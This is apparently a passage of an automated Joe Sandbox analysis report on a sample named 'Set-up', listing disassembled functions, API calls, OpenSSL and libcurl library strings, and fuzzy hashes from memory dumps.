Opcode Fuzzy Hash: abcda446a920d8f559dc1f1adaef9508445620c066f55849a65a79ab907f66ac
Instruction Fuzzy Hash: EE02A0B0A48B409BE7A48F14DD40727BBD1FF54318F18582CD98ACB7D2E775E8858B92

Function 00AA46B0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AA46DD

Strings

ASN1_mbstring_ncopy, xrefs: 00AA4797, 00AA47BC, 00AA47E1, 00AA4806, 00AA4845, 00AA4884, 00AA492C, 00AA49DE, 00AA4A35
crypto/asn1/a_mbstr.c, xrefs: 00AA479E, 00AA47C3, 00AA47E8, 00AA480D, 00AA484C, 00AA488B, 00AA4933, 00AA4A3F, 00AA4A9D
maxsize=%ld, xrefs: 00AA4899
minsize=%ld, xrefs: 00AA485A

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen
String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
API String ID: 39653677-2338284442
Opcode ID: cc74887757d57c301dedaca84224afb7af89758ce4a5ae23726903a7630fbc55
Instruction ID: 382e9b3a10e16dd6d507f35d1128a1baa1f020f5f436ce9c747198f204582cd5
Opcode Fuzzy Hash: cc74887757d57c301dedaca84224afb7af89758ce4a5ae23726903a7630fbc55
Instruction Fuzzy Hash: F8A11771B48301AFD324AF58AD42B6BB394ABDBB54F04452CF9495B3C2E7F5D80482A7

Function 009F2530 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 306COMMON

Download Yara Rule

Strings

crypto/objects/obj_dat.c, xrefs: 009F2810
.%lu, xrefs: 009F2761

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: .%lu$crypto/objects/obj_dat.c
API String ID: 0-3322715555
Opcode ID: 3f49bf41cfc064dbdb9860d11913af71e8b5d4dc45e2be8976df929e83c27857
Instruction ID: ba36e5546cb80fdceb000e5b7206ad94fe3955a233bd391460ac5f81b76cbaaf
Opcode Fuzzy Hash: 3f49bf41cfc064dbdb9860d11913af71e8b5d4dc45e2be8976df929e83c27857
Instruction Fuzzy Hash: 48A1F1B1A083099BD710AF25895173BB7E9AFD0744F18882DFA898B351EB75DC04D792

Function 0081E300 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 283COMMON

Download Yara Rule

Strings

No URL set, xrefs: 0081E393
cannot mix POSTFIELDS with RESUME_FROM, xrefs: 0081E3C1
User-Agent: %s, xrefs: 0081E60C
transfer.c, xrefs: 0081E331, 0081E364, 0081E479, 0081E59A, 0081E5E4, 0081E70D, 0081E729

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
API String ID: 0-950935550
Opcode ID: d974e04360224be1e402f62646f4c24595c4ec07b168d383caf51fc8797d8ee9
Instruction ID: 2ade7e2d9795ff4ae669e9657adffcd9faba6cd3e07db6fe31e4868492f8b6dc
Opcode Fuzzy Hash: d974e04360224be1e402f62646f4c24595c4ec07b168d383caf51fc8797d8ee9
Instruction Fuzzy Hash: D5B1B4B1B00A02ABE7299B78DC45BE6FB94FF51315F040239E86CD2281E73575A4DBD2

Function 0095A210 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0095A37F

Strings

ssl/quic/quic_channel.c, xrefs: 0095A2E3, 0095A3BA
QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 0095A310
ossl_quic_channel_raise_protocol_error_loc, xrefs: 0095A2D9, 0095A3B0
QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 0095A3D5

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen
String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
API String ID: 39653677-1084217658
Opcode ID: a4a73e1ec608f53f210c19529f17c3a0e6559349e4367b194e58013a08963490
Instruction ID: b4047cbe74305f9d23cd9c7884437b51d19e897451414d3b4d0defc0bf2f7b13
Opcode Fuzzy Hash: a4a73e1ec608f53f210c19529f17c3a0e6559349e4367b194e58013a08963490
Instruction Fuzzy Hash: EF516FB1A04345AFDF00DF69DC42E9B7BE9AFC8754F044A28FD4897241E631D918CBA2

Function 00B86250 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,008D0E3B,?,?,00000000,?), ref: 00B863E9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,008D0E3B,?,?,00000000,?), ref: 00B863FB

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 1689a47b29146103d0071874d61a8e964020db24653e57398c77eada799663d4
Instruction ID: 28b331668a2a4a73ad25c29a24ba448e5c8338584db71cb665e8a2584f9cc0bc
Opcode Fuzzy Hash: 1689a47b29146103d0071874d61a8e964020db24653e57398c77eada799663d4
Instruction Fuzzy Hash: 6841AEB1A083119BEB04BE6DA8C1A2B77E9EB94714F5944BCE849C7221E670EC04C796

Function 009B67F0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 009B691C

Strings

reason(%lu), xrefs: 009B68E1
lib(%lu), xrefs: 009B689A
err:%lx:%lx:%lx:%lx, xrefs: 009B6933
error:%08lX:%s:%s:%s, xrefs: 009B68FE

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen
String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
API String ID: 39653677-804487489
Opcode ID: 3920677af1e5c73698392aef304c6a68862590e6c75c20690c5b8035a65278ae
Instruction ID: bdcbbb2cf166903ddb6d4e58c96da855a5bcde28f3fa29f29195e3d1ee0416c4
Opcode Fuzzy Hash: 3920677af1e5c73698392aef304c6a68862590e6c75c20690c5b8035a65278ae
Instruction Fuzzy Hash: B331E9B2A04304BBFB306A159D46BEB769C9BD1714F040438FD5C562D2F679BD1CC2A1

Function 00B4A340 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 106stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00B4ABB9), ref: 00B4A34E

Part of subcall function 009DE270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 009DE28D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00B4ABB9), ref: 00B4A446

Strings

.cnf, xrefs: 00B4A38E
.conf, xrefs: 00B4A376
crypto/conf/conf_def.c, xrefs: 00B4A3B9, 00B4A410

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$_errno
String ID: .cnf$.conf$crypto/conf/conf_def.c
API String ID: 3066963124-3060939390
Opcode ID: b018278e29938eb3ab17ac77195f54f861f6e6d1bffa2c02ee4cb48412666205
Instruction ID: 0897222c9ab1f1863008adb67bc1010e1d0276c0037d71576bc52e22ea70e4fd
Opcode Fuzzy Hash: b018278e29938eb3ab17ac77195f54f861f6e6d1bffa2c02ee4cb48412666205
Instruction Fuzzy Hash: DD21F7F6E842026BEA107B34AC82F1F36DCDF91755F044879F94996382FA65DE089263

Function 00990870 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,009DF556,00000000,FFFFFFFF,00000000,?,00000000,009E06DF,?), ref: 009908D7
memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,0095973B), ref: 00990977

Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8

Strings

crypto/buffer/buffer.c, xrefs: 009908A1, 009908FC, 00990911, 00990946
BUF_MEM_grow, xrefs: 0099089A

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memsetstrcpystrlen
String ID: BUF_MEM_grow$crypto/buffer/buffer.c
API String ID: 1298912638-2735992530
Opcode ID: 67489a9b8910a5fea3495afda0b51522efb3f8a664ac50c06271612ee26f2802
Instruction ID: d137dbbc55beb0fbd7cc38fe751dd1805c89185461a7aee782d1c0a0d3c7cf68
Opcode Fuzzy Hash: 67489a9b8910a5fea3495afda0b51522efb3f8a664ac50c06271612ee26f2802
Instruction Fuzzy Hash: B331E7B1E442026FEB14AA689C03B2AB79C9BC0724F148625F928973D3E765AC1487E1

Function 00B866C0 Relevance: 7.6, APIs: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B87850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00B866E9,?,?,?,?,?,?,?,?,?,?,?), ref: 00B8787B

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B866F5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00E1530C,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86714
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86727
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B86776
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B867CC

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _errno$strcmp
String ID:
API String ID: 3909137471-0
Opcode ID: 309888f0386485ee0f628ed3fa826d34a07e21f5f99598aa686e07b6bcc2e5a3
Instruction ID: 62bc0b55b382aaf158c1399bb1af8461636dc69e5b1d237324a8bb107d6305b9
Opcode Fuzzy Hash: 309888f0386485ee0f628ed3fa826d34a07e21f5f99598aa686e07b6bcc2e5a3
Instruction Fuzzy Hash: 0731BF796002009FDF10AF65DC44A5A77E9EF4A328F4445A8FD98EB221F731ED11CB91

Function 009E2010 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,009E2704,00000008), ref: 009E204D

Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,009E2704,00000008), ref: 009E20C3

Strings

copy_integer, xrefs: 009E20DA
crypto/params.c, xrefs: 009E2090, 009E20E4
general_set_int, xrefs: 009E2086

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$general_set_int
API String ID: 2323844366-2562949257
Opcode ID: 0b5de4c80d71f72fa37f60194a694dd917a58d0b8c8cb2f0082d06003fc5f4ad
Instruction ID: ec97d7a9cc03311dd3a7443149259abafeddd3758c72727d7fd2c2dbe24ae2be
Opcode Fuzzy Hash: 0b5de4c80d71f72fa37f60194a694dd917a58d0b8c8cb2f0082d06003fc5f4ad
Instruction Fuzzy Hash: 4A213D70A0C3806BD2316B69AC82F77B79CDBC4715F184539F909862C3E6A6AC05C2A1

Function 009E2140 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,009E299E,00000008), ref: 009E21A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,009E299E,00000008), ref: 009E21FE

Part of subcall function 009E40A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,009E2075,?,?,?,?,?,?,009E2704,00000008), ref: 009E40C1
Part of subcall function 009E40A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,009E2075,?,?,?,?,?,?,009E2704,00000008), ref: 009E411E

Strings

copy_integer, xrefs: 009E2214
crypto/params.c, xrefs: 009E2180, 009E21C4, 009E221E
general_get_uint, xrefs: 009E2176, 009E21BA

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
